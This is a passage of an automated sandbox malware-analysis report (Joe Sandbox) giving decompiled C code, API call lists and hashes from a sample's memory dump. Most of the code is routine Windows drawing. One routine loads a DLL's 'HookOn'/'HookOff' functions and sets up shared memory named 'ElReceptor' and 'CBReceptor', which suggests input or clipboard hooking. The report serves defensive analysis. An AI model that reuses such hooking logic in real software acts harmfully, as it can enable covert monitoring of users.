                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					_v40 = _t88;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v40);
                                                                                                                                                                                                                            					_push(_a32);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					if(_v40 == 0) {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_t91 =  *0x49e894; // 0x5e080725
                                                                                                                                                                                                                            						_push(_t91);
                                                                                                                                                                                                                            						_t92 = _v20;
                                                                                                                                                                                                                            						_push(_t92);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						_v40 = _t92;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(_v40);
                                                                                                                                                                                                                            						_t135 = _v20;
                                                                                                                                                                                                                            						_push(_t135);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						_v40 = _t135;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_v20);
                                                                                                                                                                                                                            					L00407418();
                                                                                                                                                                                                                            					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                                                                                                                                                                                                                            					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                                                                                                                                                                                                                            					_v32 = SetTextColor(_t173, 0);
                                                                                                                                                                                                                            					_v36 = SetBkColor(_t173, 0xffffff);
                                                                                                                                                                                                                            					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                                                                                                                                                                                                                            					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                                                                                                                                                                                                                            					SetTextColor(_t173, _v32);
                                                                                                                                                                                                                            					SetBkColor(_t173, _v36);
                                                                                                                                                                                                                            					if(_v28 != 0) {
                                                                                                                                                                                                                            						SelectObject(_v20, _v28);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					DeleteObject(_v24);
                                                                                                                                                                                                                            					_pop(_t169);
                                                                                                                                                                                                                            					 *[fs:eax] = _t169;
                                                                                                                                                                                                                            					_push(0x42648b);
                                                                                                                                                                                                                            					if(_v40 != 0) {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v40);
                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return DeleteDC(_v20);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(_a32);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v24 = E00426060(_a32);
                                                                                                                                                                                                                            					_v24 = SelectObject(_a12, _v24);
                                                                                                                                                                                                                            					_push(_t177);
                                                                                                                                                                                                                            					_push(0x4262d7);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t179;
                                                                                                                                                                                                                            					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A44(0xaa0029, 0xcc0020));
                                                                                                                                                                                                                            					_pop(_t171);
                                                                                                                                                                                                                            					 *[fs:eax] = _t171;
                                                                                                                                                                                                                            					_push(0x42648b);
                                                                                                                                                                                                                            					_v24 = SelectObject(_a12, _v24);
                                                                                                                                                                                                                            					return DeleteObject(_v24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                            0x00426251
                                                                                                                                                                                                                            0x00426261
                                                                                                                                                                                                                            0x00426266
                                                                                                                                                                                                                            0x00426267
                                                                                                                                                                                                                            0x0042626c
                                                                                                                                                                                                                            0x0042626f
                                                                                                                                                                                                                            0x004262ab
                                                                                                                                                                                                                            0x004262b2
                                                                                                                                                                                                                            0x004262b5
                                                                                                                                                                                                                            0x004262b8
                                                                                                                                                                                                                            0x004262ca
                                                                                                                                                                                                                            0x004262d6
                                                                                                                                                                                                                            0x004262d6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,00000001,00000001), ref: 00426247
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042625C
                                                                                                                                                                                                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004262C5
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004262D1
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 004262E5
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,?,?,00000000,00426484,?,00000000), ref: 00426306
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042631B
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,5E080725,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 0042632F
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 00426341
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000,00426484), ref: 00426356
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,5E080725,000000FF,?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000,00426484), ref: 0042636C
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,5E080725,000000FF,?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000), ref: 00426378
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 0042642D
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00426437
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00426453
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,0042648B,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00426475
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 0042647E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3348367721-0
                                                                                                                                                                                                                            • Opcode ID: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                                                                                                                                                                                            • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00429708(void* __eax, long __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct HDC__* _v20;
                                                                                                                                                                                                                            				char _v21;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                                                                            				int _v108;
                                                                                                                                                                                                                            				int _v112;
                                                                                                                                                                                                                            				void _v116;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				long _t77;
                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                                                                            				intOrPtr _t117;
                                                                                                                                                                                                                            				long _t120;
                                                                                                                                                                                                                            				intOrPtr _t123;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				void* _t129;
                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t127 = _t129;
                                                                                                                                                                                                                            				_t130 = _t129 + 0xffffff90;
                                                                                                                                                                                                                            				_t120 = __ecx;
                                                                                                                                                                                                                            				_t123 = __edx;
                                                                                                                                                                                                                            				_t107 = __eax;
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00428BFC(_t107);
                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                            					_push(_t127);
                                                                                                                                                                                                                            					_push(0x429903);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t130;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407638();
                                                                                                                                                                                                                            					_v12 = E00426060(0);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_v20 = E00426060(_v12);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(_v108);
                                                                                                                                                                                                                            					_t64 = _v112;
                                                                                                                                                                                                                            					_push(_t64);
                                                                                                                                                                                                                            					L004072C8();
                                                                                                                                                                                                                            					_v8 = _t64;
                                                                                                                                                                                                                            					if(_v8 == 0) {
                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                            						_t65 = 0;
                                                                                                                                                                                                                            						_pop(_t116);
                                                                                                                                                                                                                            						 *[fs:eax] = _t116;
                                                                                                                                                                                                                            						_push(0x42990a);
                                                                                                                                                                                                                            						if(_v20 != 0) {
                                                                                                                                                                                                                            							_t65 = DeleteDC(_v20);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_v12 != 0) {
                                                                                                                                                                                                                            							_t66 = _v12;
                                                                                                                                                                                                                            							_push(_t66);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							L00407888();
                                                                                                                                                                                                                            							return _t66;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						return _t65;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v32 = SelectObject(_v20, _v8);
                                                                                                                                                                                                                            						if(__ecx != 0x1fffffff) {
                                                                                                                                                                                                                            							_push(_v12);
                                                                                                                                                                                                                            							L004072E0();
                                                                                                                                                                                                                            							_v16 = E00426060(_v12);
                                                                                                                                                                                                                            							_push(_t127);
                                                                                                                                                                                                                            							_push(0x4298bb);
                                                                                                                                                                                                                            							_push( *[fs:eax]);
                                                                                                                                                                                                                            							 *[fs:eax] = _t130;
                                                                                                                                                                                                                            							if(_v96 == 0) {
                                                                                                                                                                                                                            								_v21 = 0;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v21 = 1;
                                                                                                                                                                                                                            								_v92 = 0;
                                                                                                                                                                                                                            								_t107 = E00429040(_t107, _t123, _t123, 0,  &_v116);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v28 = SelectObject(_v16, _t107);
                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                            								_push(_t123);
                                                                                                                                                                                                                            								_push(_v16);
                                                                                                                                                                                                                            								L00407440();
                                                                                                                                                                                                                            								_push(_v16);
                                                                                                                                                                                                                            								L00407418();
                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                            								_push(_t123);
                                                                                                                                                                                                                            								_push(_v20);
                                                                                                                                                                                                                            								L00407440();
                                                                                                                                                                                                                            								_push(_v20);
                                                                                                                                                                                                                            								L00407418();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t77 = SetBkColor(_v16, _t120);
                                                                                                                                                                                                                            							_push(0xcc0020);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(_v16);
                                                                                                                                                                                                                            							_push(_v108);
                                                                                                                                                                                                                            							_push(_v112);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(_v20);
                                                                                                                                                                                                                            							L004072B8();
                                                                                                                                                                                                                            							SetBkColor(_v16, _t77);
                                                                                                                                                                                                                            							if(_v28 != 0) {
                                                                                                                                                                                                                            								SelectObject(_v16, _v28);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_v21 != 0) {
                                                                                                                                                                                                                            								DeleteObject(_t107);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_pop(_t117);
                                                                                                                                                                                                                            							 *[fs:eax] = _t117;
                                                                                                                                                                                                                            							_push(0x4298c2);
                                                                                                                                                                                                                            							return DeleteDC(_v16);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                                                                                                                                                                                                            							if(_v32 != 0) {
                                                                                                                                                                                                                            								SelectObject(_v20, _v32);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                            0x00429825
                                                                                                                                                                                                                            0x00429829
                                                                                                                                                                                                                            0x0042982a
                                                                                                                                                                                                                            0x00429832
                                                                                                                                                                                                                            0x00429833
                                                                                                                                                                                                                            0x00429838
                                                                                                                                                                                                                            0x0042983a
                                                                                                                                                                                                                            0x0042983e
                                                                                                                                                                                                                            0x0042983f
                                                                                                                                                                                                                            0x00429847
                                                                                                                                                                                                                            0x00429848
                                                                                                                                                                                                                            0x00429848
                                                                                                                                                                                                                            0x00429852
                                                                                                                                                                                                                            0x00429859
                                                                                                                                                                                                                            0x0042985e
                                                                                                                                                                                                                            0x00429860
                                                                                                                                                                                                                            0x00429865
                                                                                                                                                                                                                            0x00429869
                                                                                                                                                                                                                            0x0042986d
                                                                                                                                                                                                                            0x0042986e
                                                                                                                                                                                                                            0x00429870
                                                                                                                                                                                                                            0x00429875
                                                                                                                                                                                                                            0x00429876
                                                                                                                                                                                                                            0x00429880
                                                                                                                                                                                                                            0x00429889
                                                                                                                                                                                                                            0x00429893
                                                                                                                                                                                                                            0x00429893
                                                                                                                                                                                                                            0x0042989c
                                                                                                                                                                                                                            0x0042989f
                                                                                                                                                                                                                            0x0042989f
                                                                                                                                                                                                                            0x004298a6
                                                                                                                                                                                                                            0x004298a9
                                                                                                                                                                                                                            0x004298ac
                                                                                                                                                                                                                            0x004298ba
                                                                                                                                                                                                                            0x004297af
                                                                                                                                                                                                                            0x004297c1
                                                                                                                                                                                                                            0x004298c6
                                                                                                                                                                                                                            0x004298d0
                                                                                                                                                                                                                            0x004298d0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004298c6
                                                                                                                                                                                                                            0x004297ad
                                                                                                                                                                                                                            0x00429791

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetObjectA.GDI32(?,00000054,?), ref: 0042972B
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,00000000,00429903,?,?,00000054,?), ref: 00429759
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,00000000,00000000,00429903,?,?,00000054,?), ref: 0042976A
                                                                                                                                                                                                                            • 73C9A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 00429785
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042979F
                                                                                                                                                                                                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 004297C1
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 004297CF
                                                                                                                                                                                                                            • SelectObject.GDI32(?), ref: 00429817
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0042982A
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?,?,00000001,00000001), ref: 00429833
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?), ref: 0042983F
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000), ref: 00429848
                                                                                                                                                                                                                            • SetBkColor.GDI32(?), ref: 00429852
                                                                                                                                                                                                                            • 73CA97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,004298BB), ref: 00429876
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00429880
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00429893
                                                                                                                                                                                                                            • DeleteObject.GDI32 ref: 0042989F
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004298B5
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004298D0
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004298EC
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,0042990A,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 004298FD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$Delete$A590B150B410Color$A410B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2498167796-0
                                                                                                                                                                                                                            • Opcode ID: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                                                                                                                                                                                            • Instruction ID: d4ef2d2dc6560d6c5cd56807feb3c438281ae7d61b0b2818eaec840712012d23
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95516071F04218BBDB10EBE9DC45FAFB7FCAB09704F54446AB614F7281C678A9408B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t30;
                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				void _t97;
                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t97 = __ecx;
                                                                                                                                                                                                                            				_t74 = __edx;
                                                                                                                                                                                                                            				_t99 = __eax;
                                                                                                                                                                                                                            				_push(_t102);
                                                                                                                                                                                                                            				_push(0x476697);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t102;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(__eax + 0x48))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 =  *(_t99 + 0x40);
                                                                                                                                                                                                                            					if(_t30 != 0) {
                                                                                                                                                                                                                            						FreeLibrary(_t30);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *(_t99 + 0x30) != 0) {
                                                                                                                                                                                                                            						UnmapViewOfFile( *(_t99 + 0x38));
                                                                                                                                                                                                                            						UnmapViewOfFile( *(_t99 + 0x3c));
                                                                                                                                                                                                                            						CloseHandle( *(_t99 + 0x30));
                                                                                                                                                                                                                            						CloseHandle( *(_t99 + 0x34));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t82 =  *0x49ec58; // 0x0
                                                                                                                                                                                                                            					E0047671C(__edx, _t82, __edx, __ecx, __eax);
                                                                                                                                                                                                                            					_t46 =  *0x49ec5c; // 0x0
                                                                                                                                                                                                                            					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
                                                                                                                                                                                                                            					if( *(_t99 + 0x40) == 0) {
                                                                                                                                                                                                                            						_t86 =  *0x49ec58; // 0x0
                                                                                                                                                                                                                            						E00404CCC( &_v8, _t86, 0x4766ac);
                                                                                                                                                                                                                            						E0047671C(_t74, _v8, _t74, _t97, _t99);
                                                                                                                                                                                                                            						_t70 =  *0x49ec5c; // 0x0
                                                                                                                                                                                                                            						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
                                                                                                                                                                                                                            						E0040D144(0x4766c8, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t75 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "ElReceptor");
                                                                                                                                                                                                                            					 *(_t99 + 0x30) = _t75;
                                                                                                                                                                                                                            					if(_t75 == 0) {
                                                                                                                                                                                                                            						E0040D144(0x4766f8, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
                                                                                                                                                                                                                            					 *(_t99 + 0x38) = _t76;
                                                                                                                                                                                                                            					 *_t76 = _t97;
                                                                                                                                                                                                                            					_t77 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "CBReceptor");
                                                                                                                                                                                                                            					 *(_t99 + 0x34) = _t77;
                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                            						E0040D144(0x4766f8, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
                                                                                                                                                                                                                            					 *(_t99 + 0x3c) = _t78;
                                                                                                                                                                                                                            					 *_t78 = _t97;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t99 + 0x44))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t89);
                                                                                                                                                                                                                            				 *[fs:eax] = _t89;
                                                                                                                                                                                                                            				_push(0x47669e);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000), ref: 00476522
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00476697), ref: 0047655A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,ElReceptor,00000000,HookOff,00000000,HookOn), ref: 004765E5
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 00476600
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476652
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476661
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 0047666A
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476673
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047667C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                                                                                                                                                                                            • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                                                                                                                                                                                            • API String ID: 2408097603-676361416
                                                                                                                                                                                                                            • Opcode ID: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                                                                                                                                                                                            • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                                                                                                                                                                                            Uniqueness

